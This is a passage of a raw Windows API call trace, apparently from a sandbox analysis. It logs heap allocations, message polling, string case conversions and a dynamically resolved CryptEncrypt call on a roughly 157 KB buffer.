[0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.287] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.287] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0244.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0244.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.288] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.288] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.288] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.288] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0244.289] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x350f158 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0244.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0244.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aab38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.295] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0244.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0244.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0244.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0244.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0244.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0244.297] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x26775, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x26778) returned 1 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0244.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0244.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0244.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0244.300] CharLowerBuffW (in: lpsz="byte[157560]", cchLength=0xc | out: lpsz="byte[157560]") returned 0xc [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0244.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0244.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0244.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0244.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 